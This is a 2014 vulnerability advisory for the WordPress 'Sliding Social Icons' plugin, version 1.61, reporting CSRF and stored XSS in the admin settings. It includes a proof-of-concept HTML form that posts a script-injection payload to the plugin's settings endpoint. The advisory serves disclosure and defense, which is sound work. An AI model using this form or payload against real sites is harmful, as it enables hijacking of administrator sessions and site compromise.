Title: WordPress 'Sliding Social Icons' plugin - CSRF/XSS Version: 1.61 Reported by: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/sliding-social-icons/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- WordPress Sliding Widgets Plugin will help your to create a sliding icon list dynamically where you can place on your website. The icons slide into the screen when you hover over them. This plugin also allows you to enter a shortcode for a contact form or newsletter or any other shortcode, shows up in a sliding screen ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and then submit the following form. <form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=wpbs_panel"> <input type="text" name="action" value="wpbs_save_settings"><br /> <input type="text" name="sc_social_slider_margin" value="&quot;><script>alert(1)</script>"><br /> <input type="text" name="sc_social_slider_save" value="Update"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- No fix available. The plugin has been closed by WordPress until it is updated.